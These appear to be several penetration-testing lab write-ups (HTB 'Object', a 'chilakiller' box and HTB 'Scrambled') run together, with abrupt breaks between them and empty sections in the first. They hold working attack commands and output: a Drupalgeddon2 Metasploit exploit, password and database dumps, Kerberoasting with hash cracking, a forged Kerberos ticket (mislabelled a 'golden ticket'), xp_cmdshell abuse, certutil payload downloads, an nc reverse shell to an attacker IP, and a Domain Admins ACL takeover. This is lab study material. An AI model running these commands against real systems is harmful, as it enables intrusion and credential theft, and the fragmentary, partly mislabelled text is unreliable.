htb-object-nl

Object

NMAP

PORT     STATE SERVICE VERSION
80/tcp   open  http    Microsoft IIS httpd 10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Mega Engines
5985/tcp open  http    Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
8080/tcp open  http    Jetty 9.4.43.v20210629
|_http-favicon: Unknown favicon MD5: 23E8C7BD78E8CD826C5A6073B15068B1
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: Jetty(9.4.43.v20210629)
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

PORT 80 (HTTP)

PORT 8080 (HTTP)

cmd.exe /c powershell.exe -c Get-NetFirewallRule -Action Block -Enabled True -Direction Outbound

Foothold

┌──(puck㉿kali)-[~/htb/object]
└─$ evil-winrm -i 10.10.11.132 -u oliver -p c1cdfun_d2434


Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\oliver\Documents> $env:USERDNSDOMAIN
object.local
*Evil-WinRM* PS C:\Users\oliver\Documents> mkdir puck


Directory: C:\Users\oliver\Documents


Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 3/23/2024 8:54 AM puck


*Evil-WinRM* PS C:\Users\oliver\Documents> cd puck
*Evil-WinRM* PS C:\Users\oliver\Documents\puck> upload SharpHound.exe

Info: Uploading /home/puck/htb/object/SharpHound.exe to C:\Users\oliver\Documents\puck\SharpHound.exe

Data: 1395368 bytes of 1395368 bytes copied

Info: Upload successful!
*Evil-WinRM* PS C:\Users\oliver\Documents\puck> ./SharpHound.exe all
2024-03-23T08:55:50.0837796-07:00|INFORMATION|This version of SharpHound is compatible with the 4.3.1 Release of BloodHound
2024-03-23T08:55:50.2243965-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2024-03-23T08:55:50.2556464-07:00|INFORMATION|Initializing SharpHound at 8:55 AM on 3/23/2024
2024-03-23T08:55:50.4119095-07:00|INFORMATION|[CommonLib LDAPUtils]Found usable Domain Controller for object.local : jenkins.object.local
2024-03-23T08:55:50.4431626-07:00|INFORMATION|Flags: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2024-03-23T08:55:50.5993967-07:00|INFORMATION|Beginning LDAP search for object.local
2024-03-23T08:55:50.6462777-07:00|INFORMATION|Producer has finished, closing LDAP channel
2024-03-23T08:55:50.6618979-07:00|INFORMATION|LDAP channel closed, waiting for consumers
2024-03-23T08:56:21.3267021-07:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 36 MB RAM
2024-03-23T08:56:36.5571557-07:00|INFORMATION|Consumers finished, closing output channel
2024-03-23T08:56:36.5884055-07:00|INFORMATION|Output channel closed, waiting for output task to complete
Closing writers
2024-03-23T08:56:36.7915241-07:00|INFORMATION|Status: 92 objects finished (+92 2)/s -- Using 44 MB RAM
2024-03-23T08:56:36.7915241-07:00|INFORMATION|Enumeration finished in 00:00:46.2025467
2024-03-23T08:56:36.8696534-07:00|INFORMATION|Saving cache with stats: 52 ID to type mappings.
52 name to SID mappings.
0 machine sid mappings.
2 sid to domain mappings.
0 global catalog mappings.
2024-03-23T08:56:36.8852775-07:00|INFORMATION|SharpHound Enumeration Completed at 8:56 AM on 3/23/2024! Happy Graphing!
*Evil-WinRM* PS C:\Users\oliver\Documents\puck> ls


Directory: C:\Users\oliver\Documents\puck


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 3/23/2024 8:56 AM 11437 20240323085636_BloodHound.zip
-a---- 3/23/2024 8:56 AM 7897 MWU2MmE0MDctMjBkZi00N2VjLTliOTMtYThjYTY4MjdhZDA2.bin
-a---- 3/23/2024 8:55 AM 1046528 SharpHound.exe


*Evil-WinRM* PS C:\Users\oliver\Documents\puck> download 20240323085636_BloodHound.zip

Info: Downloading C:\Users\oliver\Documents\puck\20240323085636_BloodHound.zip to 20240323085636_BloodHound.zip

Info: Download successful!
*Evil-WinRM* PS C:\Users\oliver\Documents\puck>


Privilege Escalation (Smith)

Privilege Escalation (Maria)

Set-DomainObject -Identity maria -SET @{scriptpath="C:\ProgramData\logonscript.ps1"}
dir C:\Users\maria\Desktop > C:\ProgramData\dir_result.txt
copy C:\Users\maria\Desktop\Engines.xls C:\ProgramData\
Set-DomainObjectOwner -Identity "Domain Admins" -OwnerIdentity maria
Add-DomainObjectAcl -TargetIdentity "Domain Admins" -PrincipalIdentity maria -Rights Al
Add-DomainGroupMember -Identity 'Domain Admins' -Members 'maria'

References

ptd-chilakiller


┌─[puck@parrot-lt]─[~/ptd/10.150.150.182]
└──╼ $cat ports.nmap 
# Nmap 7.92 scan initiated Mon Aug 29 10:17:40 2022 as: nmap -sC -sV -oN ports.nmap 10.150.150.182
Nmap scan report for 10.150.150.182
Host is up (0.086s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
| ssh-hostkey: 
| 2048 8e:0a:83:30:6b:a5:ef:12:81:4a:8e:66:c6:f4:22:12 (RSA)
| 256 ef:77:5e:a9:59:19:de:f8:c3:f3:1c:2e:73:09:8a:8f (ECDSA)
|_ 256 b3:be:3b:05:0c:f7:62:24:ce:1b:5c:5b:df:cc:fc:23 (ED25519)
80/tcp open http nginx 1.4.0 (Ubuntu)
| fingerprint-strings: 
| GetRequest: 
| HTTP/1.1 200 OK
| Date: Mon, 29 Aug 2022 09:00:40 GMT
| Server: nginx 1.4.0 (Ubuntu)
| Last-Modified: Sat, 01 Aug 2020 20:47:30 GMT
| ETag: "264-5abd7039b3849"
| Accept-Ranges: bytes
| Content-Length: 612
| Vary: Accept-Encoding
| Connection: close
| Content-Type: text/html
| <!DOCTYPE html>
| <html>
| <head>
| <title>Welcome to nginx!</title>
| <style>
| body {
| width: 35em;
| margin: 0 auto;
| font-family: Tahoma, Verdana, Arial, sans-serif;
| </style>
| </head>
| <body>
| <h1>Welcome to nginx!</h1>
| <p>If you see this page, the nginx web server is successfully installed and
| working. Further configuration is required.</p>
| <p>For online documentation and support please refer to
| href="http://nginx.org/">nginx.org</a>.<br/>
| Commercial support is available at
| href="http://nginx.com/">nginx.com</a>.</p>
| <p><em>Thank you for using nginx.</em></p>
| </body>
| </html>
| HTTPOptions: 
| HTTP/1.1 200 OK
| Date: Mon, 29 Aug 2022 09:00:40 GMT
| Server: nginx 1.4.0 (Ubuntu)
| Allow: OPTIONS,HEAD,HEAD,GET,HEAD,POST
| Content-Length: 0
| Connection: close
| Content-Type: text/html
| RTSPRequest: 
| HTTP/1.1 400 Bad Request
| Date: Mon, 29 Aug 2022 09:00:40 GMT
| Server: nginx 1.4.0 (Ubuntu)
| Content-Length: 299
| Connection: close
| Content-Type: text/html; charset=iso-8859-1
| <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
| <html><head>
| <title>400 Bad Request</title>
| </head><body>
| <h1>Bad Request</h1>
| <p>Your browser sent a request that this server could not understand.<br />
| </p>
| <hr>
| <address>nginx 1.4.0 (Ubuntu) Server at 127.0.1.1 Port 80</address>
|_ </body></html>
|_http-title: Welcome to nginx!
|_http-server-header: nginx 1.4.0 (Ubuntu)
8080/tcp open http-proxy nginx 1.4.0 (Ubuntu)
| fingerprint-strings: 
| GetRequest: 
| HTTP/1.1 200 OK
| Date: Mon, 29 Aug 2022 09:00:40 GMT
| Server: nginx 1.4.0 (Ubuntu)
| Last-Modified: Sat, 01 Aug 2020 20:47:30 GMT
| ETag: "264-5abd7039b3849"
| Accept-Ranges: bytes
| Content-Length: 612
| Vary: Accept-Encoding
| Connection: close
| Content-Type: text/html
| <!DOCTYPE html>
| <html>
| <head>
| <title>Welcome to nginx!</title>
| <style>
| body {
| width: 35em;
| margin: 0 auto;
| font-family: Tahoma, Verdana, Arial, sans-serif;
| </style>
| </head>
| <body>
| <h1>Welcome to nginx!</h1>
| <p>If you see this page, the nginx web server is successfully installed and
|--snipp--
\x2080</address>\n</body></
SF:html>\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Aug 29 10:19:25 2022 -- 1 IP address (1 host up) scanned in 105.42 seconds
┌─[puck@parrot-lt]─[~/ptd/10.150.150.182]


┌─[puck@parrot-lt]─[~/ptd/10.150.150.182]
└──╼ $cat notes.txt
chilakiller
[msf](Jobs:0 Agents:0) exploit(unix/webapp/drupal_drupalgeddon2) >> set T
set TARGET set TARGETURI set TIMESTAMPOUTPUT
[msf](Jobs:0 Agents:0) exploit(unix/webapp/drupal_drupalgeddon2) >> set TARGETURI /restaurante
TARGETURI => /restaurante
[msf](Jobs:0 Agents:0) exploit(unix/webapp/drupal_drupalgeddon2) >> run

[*] Started reverse TCP handler on 10.66.67.22:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Sending stage (39927 bytes) to 10.150.150.182
[*] Meterpreter session 1 opened (10.66.67.22:4444 -> 10.150.150.182:32828) at 2022-08-29 12:16:38 +0200

ls
ls
(Meterpreter 1)(/var/www/html/restaurante) >

cat freegift.html
<html>
<head>
<title>Redeem your free gift</title>
</head>
<body>
<!-- FLAG4=3bbff3b43813668741aa213b2cd0cff29c0c7542 -->
</body>

</html>

www-data@chilakiller:/var/www/html/restaurante/sites/default$ cat settings.php | grep password
 *   'password' => 'password',
 * username, password, host, and database name.
 *   'password' => 'password',
 *   'password' => 'password',
 *   'password' => 'password',
 *   'password' => 'password',
      'password' => 'EstaContraNoesTanImp0rtant3!!!',
 * by using the username and password variables. The proxy_user_agent variable
# $conf['proxy_password'] = '';
www-data@chilakiller:/var/www/html/restaurante/sites/default$

www-data@chilakiller:/var/www/html/restaurante/sites/default$ mysql -u drupal -p
Enter password: EstaContraNoesTanImp0rtant3!!!

Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 43
Server version: 10.1.45-MariaDB-0+deb9u1 Debian 9.12

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]>

MariaDB [drupaldb]> select * from ptd_users;
+-----+---------------+---------------------------------------------------------+-----------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-----------------------+------+
| uid | name          | pass                                                    | mail                  | theme | signature | signature_format | created    | access     | login      | status | timezone            | language | picture | init                  | data |
+-----+---------------+---------------------------------------------------------+-----------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-----------------------+------+
|   0 |               |                                                         |                       |       |           | NULL             |          0 |          0 |          0 |      0 | NULL                |          |       0 |                       | NULL |
|   1 | administrador | $S$Dobcr9v53WJdz6GsuhauWnwKNTm1pZpId6/rNl6psZwj2prE3d9V | chilakiller@ptd.local |       |           | NULL             | 1596317328 | 1643552710 | 1643551677 |      1 | America/Mexico_City |          |       0 | chilakiller@ptd.local | b:0; |
+-----+---------------+---------------------------------------------------------+-----------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-----------------------+------+
2 rows in set (0.00 sec)

MariaDB [drupaldb]>

www-data@chilakiller:/var/www/html/restaurante/sites/default$ su user1
Password: user1

user1@chilakiller:/var/www/html/restaurante/sites/default$ cd /home/user1
user1@chilakiller:~$ ls
Desktop  Documents  FLAG3.txt
user1@chilakiller:~$ cat FLAG3.txt
9a8cda5f343e89e68aaec65f1df3c61ae5176a19
user1@chilakiller:~$

user1@chilakiller:/etc/openvpn/client/.config$ cat .5OBdDQ80Py
hUqJ2
ChilaKill3s_Tru3_L0v3R
user1@chilakiller:/etc/openvpn/client/.config$

su root
pw = ChilaKill3s_Tru3_L0v3R

root@chilakiller:~# cat FLAG2.txt
ccc61a1d18a937cc3db531a5216a04a805d54762

root@chilakiller:/var/www/html/restaurante# find / -name "FLAG1.txt"
find: ‘/run/user/1000/gvfs’: Permission denied
find: ‘/proc/4683/task/4683/net’: Invalid argument
find: ‘/proc/4683/net’: Invalid argument
/var/www/html/test-site/test-2/FLAG1.txt
root@chilakiller:/var/www/html/restaurante# cat /var/www/html/test-site/test-2/FLAG1.txt
ed93e58c308d60f49e97e559ab557b86add97f44
root@chilakiller:/var/www/html/restaurante#

root@chilakiller:/var/www/html/restaurante# hostnamectl
Static hostname: chilakiller
Icon name: computer-vm
Chassis: vm
Machine ID: c8677bebac964d43bed5ebe1af1caaa6
Boot ID: 907f69a447f04a8782bde75417cec04a
Virtualization: vmware
Operating System: Debian GNU/Linux 9 (stretch)
Kernel: Linux 4.9.0-13-amd64
Architecture: x86-64
root@chilakiller:/var/www/html/restaurante#

Author : Puckiestyle

 

htb-scrambled-nl

Scrambled

Scanning

> TARGET=10.10.11.168 && nmap -p$(nmap -p- --min-rate=1000 -T4 $TARGET -Pn | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) -sC -sV -Pn -vvv $TARGET -oN nmap_tcp_all.nmap
PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus
80/tcp    open  http          syn-ack ttl 127 Microsoft IIS httpd 10.0
|_http-title: Scramble Corp Intranet
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2022-06-15 23:15:44Z)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
|_ssl-date: 2022-06-15T23:18:54+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername:<unsupported>, DNS:DC1.scrm.local
| Issuer: commonName=scrm-DC1-CA/domainComponent=scrm
445/tcp   open  microsoft-ds? syn-ack ttl 127
464/tcp   open  kpasswd5?     syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
|_ssl-date: 2022-06-15T23:18:54+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername:<unsupported>, DNS:DC1.scrm.local
| Issuer: commonName=scrm-DC1-CA/domainComponent=scrm
1433/tcp  open  ms-sql-s      syn-ack ttl 127 Microsoft SQL Server 2019 15.00.2000.00; RTM
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername:<unsupported>, DNS:DC1.scrm.local
| Issuer: commonName=scrm-DC1-CA/domainComponent=scrm
3269/tcp  open  ssl/ldap      syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
|_ssl-date: 2022-06-15T23:18:54+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername:<unsupported>, DNS:DC1.scrm.local
| Issuer: commonName=scrm-DC1-CA/domainComponent=scrm
4411/tcp  open  found?        syn-ack ttl 127
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, GenericLines, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, NCP, NULL, NotesRPC, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, giop, ms-sql-s, oracle-tns: 
|     SCRAMBLECORP_ORDERS_V1.0.3;
|   FourOhFourRequest, GetRequest, HTTPOptions, Help, LPDString, RTSPRequest, SIPOptions: 
|     SCRAMBLECORP_ORDERS_V1.0.3;
|_    ERROR_UNKNOWN_COMMAND;
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
49552/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49669/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49670/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49692/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49696/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC

There are many open ports; this looks like an Active Directory domain controller, with LDAP and Kerberos enabled. Several services are worth enumerating.

Found several domain names that might be useful later.

scrm.local
DC1.scrm.local
scramblecorp.com

Web Enum

Web enum found something interesting: http://scrm.local/support.html

04/09/2021: Due to the security breach last month we have now disabled all NTLM authentication on our network. This may cause problems for some of the programs you use so please be patient while we work to resolve any issues 

http://scrm.local/supportrequest.html, there is also a username found in the screenshot, ksimpson.

http://scrm.local/salesorders.html, this page shows a client application used for this organisation. Later, we will find there is a server running on port 4411.

If you are experiencing a problem with the sales orders app, please enable debug logging and reproduce the problem. You can enable debug logging by doing the following: 

A log file named ScrambleDebugLog will have been created in the same folder you launched the sales app from. Send this file to us via email along with a description of the problem 

Directory enum didn’t find anything useful

> dirsearch -u http://scrm.local/ -x 403,401,500,400 -f
[19:48:54] Starting:
[19:50:00] 301 -  148B  - /assets  ->  http://scrm.local/assets/
[19:50:40] 301 -  148B  - /images  ->  http://scrm.local/images/
[19:50:41] 200 -    2KB - /index.html
[19:51:07] 200 -    2KB - /passwords.html
[19:51:41] 200 -    2KB - /support.html

Further page enum didn't find anything interesting

> wfuzz -c -f subdomains.txt -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://scrm.local/FUZZ.html"

Subdomain enum didn’t find anything useful

> wfuzz -c -f subdomains.txt -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://scrm.local/" -H "Host: FUZZ.scrm.local"
> wfuzz -c -f subdomains.txt -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://scramblecorp.com/" -H "Host: FUZZ.scramblecorp.com"

So, this target may not have much to do with web vectors.

Host Enum

Host enum didn't find anything useful

> enum4linux 10.10.11.168

Port 4411 Enum

Connecting to the non-standard port 4411 with nc shows a server application answering there, but at this stage we cannot tell which application it is.

> nc -vn 10.10.11.168 4411

LDAP Enum

Perform ldap enum using a simple python module

Python 3.10.4 (main, Mar 24 2022, 13:07:27) [GCC 11.2.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import ldap3
>>> server = ldap3.Server('10.10.11.168', get_info = ldap3.ALL, port =636, use_ssl = True)
>>> connection = ldap3.Connection(server)
>>> connection.bind()
>>> server.info

DSA info (from DSE):
  Supported LDAP versions: 3, 2
  Naming contexts: 
    DC=scrm,DC=local
    CN=Configuration,DC=scrm,DC=local
    CN=Schema,CN=Configuration,DC=scrm,DC=local
    DC=DomainDnsZones,DC=scrm,DC=local
    DC=ForestDnsZones,DC=scrm,DC=local

nmap scan using ldap scripts confirms the above results

> nmap -n -sV --script "ldap* and not brute" 10.10.11.168

Overall, nothing useful at this stage

Kerberos Enum

Perform username enum

> kerbrute userenum -d scrm.local --dc 10.10.11.168 /usr/share/wordlists/SecLists/Usernames/xato-net-10-million-usernames.txt

2022/06/15 20:03:16 >  [+] VALID USERNAME:       administrator@scrm.local
2022/06/15 20:04:30 >  [+] VALID USERNAME:       asmith@scrm.local
2022/06/15 20:06:16 >  [+] VALID USERNAME:       Administrator@scrm.local
2022/06/15 20:07:39 >  [+] VALID USERNAME:       jhall@scrm.local
2022/06/15 20:16:59 >  [+] VALID USERNAME:       sjenkins@scrm.local
2022/06/15 20:18:19 >  [+] VALID USERNAME:       khicks@scrm.local
2022/06/15 20:30:25 >  [+] VALID USERNAME:       Asmith@scrm.local
2022/06/15 20:48:39 >  [+] VALID USERNAME:       ASMITH@scrm.local

We also know from the earlier screenshot that there might be a user called ksimpson. We can confirm this, and this user happens to use a password that is the same as the username.

> kerbrute bruteuser -d scrm.local --dc 10.10.11.168 pass.txt ksimpson

This user can be used to obtain a TGT, to do so, use getTGT.py. Note: you may encounter an error when running the getTGT.py script, fix the script according to https://github.com/SecureAuthCorp/impacket/issues/1206

> getTGT.py scrm.local/ksimpson:ksimpson -dc-ip 10.10.11.168
> export KRB5CCNAME=ksimpson.ccache
> impacket-GetUserSPNs scrm.local/ksimpson -k -dc-ip dc1.scrm.local -no-pass -request

Some Googling shows that the author of this box has raised an issue on the Impacket GitHub for this very error with the title "GetUserSpns.py fails when using -k option and NTLM auth is disabled". The suggested fix in that issue is to edit one line, which I'll do on line 260:

        if self.__doKerberos:
            #target = self.getMachineName()
            target = self.__kdcHost

After making that change, it dumps a challenge/response (or “hash”, but not really a hash) for the MSSQLSvc user:

 


┌──(puck㉿kali)-[~/htb/scrambled]
└─$

python3 GetUserSPNs.py scrm.local/ksimpson:ksimpson -dc-ip dc1.scrm.local -request -k

Impacket v0.11.0 - Copyright 2023 Fortra

ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
---------------------------- ------ -------- -------------------------- -------------------------- ----------
MSSQLSvc/dc1.scrm.local:1433 sqlsvc 2021-11-03 17:32:02.351452 2023-10-13 15:08:55.430424
MSSQLSvc/dc1.scrm.local sqlsvc 2021-11-03 17:32:02.351452 2023-10-13 15:08:55.430424




$krb5tgs$23$*sqlsvc$SCRM.LOCAL$scrm.local/sqlsvc*$09051c16c6b00ac737cc62f4fa5dec17$

┌──(puck㉿kali)-[~/htb/scrambled]

Save the ticket to a file mssqlsvc-hash and crack using john

┌──(puck㉿kali)-[~/htb/scrambled]
└─$

john --format=krb5tgs --wordlist=/usr/share/wordlists/rockyou.txt mssqlsvc-hash

 
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Pegasus60 (?) 
1g 0:00:00:03 DONE (2023-10-13 16:12) 0.2652g/s 2846Kp/s 2846Kc/s 2846KC/s Petergrant..Pearce
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

┌──(puck㉿kali)-[~/htb/scrambled]

We now have a service principal credential, sqlsvc:Pegasus60

Foothold

Via golden ticket impersonation, we can gain foothold as the service principal, for background refer to: https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/golden-ticket

To do so, we need the ntlm hash of a valid account password and the domain SID

Get Domain SID using

┌──(puck㉿kali)-[~/htb/scrambled]
└─$

impacket-getPac -targetUser sqlsvc scrm.local/sqlsvc:Pegasus60 | grep "Domain SID"

 
Domain SID: S-1-5-21-2743207045-1827831105-2542523200


Generate the ntlm hash for the password `Pegasus60` using https://codebeautify.org/ntlm-hash-generator, this gives b999a16500b87d17ec7f2e2a68778f05

Impersonate Administrator; its user ID (RID) is 500 by convention, see Microsoft's documentation on well-known RIDs for more background.

┌──(puck㉿kali)-[~/htb/scrambled]
└─$

impacket-ticketer -nthash b999a16500b87d17ec7f2e2a68778f05 -domain-sid S-1-5-21-2743207045-1827831105-2542523200 -domain scrm.local -spn MSSQLSVC/dc1.scrm.local Administrator

Impacket v0.11.0 - Copyright 2023 Fortra

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for scrm.local/Administrator
[*] PAC_LOGON_INFO
[*] PAC_CLIENT_INFO_TYPE
[*] EncTicketPart
[*] EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] PAC_SERVER_CHECKSUM
[*] PAC_PRIVSVR_CHECKSUM
[*] EncTicketPart
[*] EncTGSRepPart
[*] Saving ticket in Administrator.ccache

┌──(puck㉿kali)-[~/htb/scrambled]

Connect to mssql via the impersonated ticket

┌──(puck㉿kali)-[~/htb/scrambled]
└─$

export KRB5CCNAME=Administrator.ccache

┌──(puck㉿kali)-[~/htb/scrambled]
└─$

klist

 
Ticket cache: FILE:Administrator.ccache
Default principal: Administrator@SCRM.LOCAL

Valid starting Expires Service principal
10/13/2023 16:28:55 10/10/2033 16:28:55 MSSQLSVC/dc1.scrm.local@SCRM.LOCAL
renew until 10/10/2033 16:28:55

┌──(puck㉿kali)-[~/htb/scrambled]
└─$

impacket-mssqlclient dc1.scrm.local -k

Impacket v0.11.0 - Copyright 2023 Fortra

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC1): Line 1: Changed database context to 'master'.
[*] INFO(DC1): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL (SCRM\administrator dbo@master)>

select name, database_id from sys.databases;

name         database_id
----------   -----------
master                 1
tempdb                 2
model                  3
msdb                   4
ScrambleHR             5

SQL (SCRM\administrator dbo@master)>

SELECT TABLE_NAME FROM ScrambleHR.INFORMATION_SCHEMA.TABLES;

TABLE_NAME
----------
Employees
UserImport
Timesheets

SQL (SCRM\administrator dbo@master)> SELECT * from ScrambleHR.dbo.UserImport;
LdapUser LdapPwd LdapDomain RefreshInterval IncludeGroups 
-------- ----------------- ---------- --------------- ------------- 
MiscSvc ScrambledEggs9900 scrm.local 90 0

SQL (SCRM\administrator dbo@master)>

Enable cmdshell

> enable_xp_cmdshell
> xp_cmdshell("whoami")

Upload nc.exe and create a reverse shell; first locate a folder the current account can write to

> xp_cmdshell certutil.exe -urlcache -f http://10.10.16.3/nc.exe ..\..\Temp\nc.exe
> xp_cmdshell ..\..\Temp\nc.exe 10.10.16.3 4444 -e cmd.exe

Upload SharpHound.exe, I used this version: /usr/lib/bloodhound/resources/app/Collectors/DebugBuilds/SharpHound.exe, and run SharpHound and transfer back to kali for analysis

> certutil.exe -urlcache -f http://10.10.16.3/sh.exe sh.exe

BloodHound analysis shows a user tstar in the IT group who has the CanPSRemote right. However, after some trial and error this proved to be useless.

PE

Upload winpeas

> certutil.exe -urlcache -f http://10.10.16.3/p.exe p.exe

# found something interesting from WinPeas
ScrmOrders(Scramble Sales Orders Server)[C:\Program Files\ScrambleCorp\SalesOrdersService\ScrambleServer.exe 4411] - Auto - Running - No quotes and Space detected

[+] Network Shares
ADMIN$ (Path: C:\Windows)
C$ (Path: C:\)
HR (Path: C:\Shares\HR) -- Permissions: AllAccess
IPC$ (Path: )
IT (Path: C:\Shares\IT) -- Permissions: AllAccess
NETLOGON (Path: C:\Windows\SYSVOL\sysvol\scrm.local\SCRIPTS)
Public (Path: C:\Shares\Public) -- Permissions: AllAccess
Sales (Path: C:\Shares\Sales) -- Permissions: AllAccess
SYSVOL (Path: C:\Windows\SYSVOL\sysvol)

There is a pdf document in C:\Shares\Public, it says HR has a database, which may contain user passwords

Check db for user passwords

> sqlcmd -q "select name from sys.databases"

Check tables in ScrambleHR

> sqlcmd -q "use ScrambleHR;select table_name from information_schema.tables"

# found
Employees
UserImport
Timesheets

Check table content of UserImport, found user MiscSvc with ldap credential

> sqlcmd -q "use ScrambleHR;select db_name();select * from UserImport;"

MiscSvc is an IT user, which means it has the CanPSRemote permission, but evil-winrm doesn't work.

In order to get a reverse shell, you can use the "PowerShell #3 (Base64)" payload from revshells.com.

SQL> xp_cmdshell powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAG[...]


kali@kali:~/Documents/HTB/Scrambled$ nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.64] from (UNKNOWN) [10.10.11.168] 57867
whoami
scrm\sqlsvc
PS C:\Windows\system32>

Now, we need to create another reverse shell in order to become MiscSvc, obtaining the user flag.

For doing so, execute the following commands:

$SecPassword = ConvertTo-SecureString 'ScrambledEggs9900' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('Scrm\MiscSvc', $SecPassword)
Invoke-Command -Computer dc1 -Credential $Cred -ScriptBlock {<SAME PAYLOAD AS BEFORE>}

Privilege Escalation

From previous enum, there is a server app running at C:\Program Files\ScrambleCorp\SalesOrdersService\ScrambleServer.exe

Checking which user runs the process returns N/A, so the process is probably running under an account with higher privileges.

> tasklist /v

However, we can access c:\shares\it, which holds a copy of the Sales Order Client application and a dll file.

* Copy these two files to c:\temp
> nc.exe 10.10.16.3 7777 < ScrambleLib.dll
> nc.exe 10.10.16.3 7777 < ScrambleClient.exe
* On kali
> nc -vnlp 7777 > ScrambleLib.dll
> nc -vnlp 7777 > ScrambleClient.exe

Reverse Eng

Running strings over the dll reveals what look like operation codes

> strings ScrambleLib.dll

Setup ilspy and reverse the dll, https://github.com/icsharpcode/ILSpy

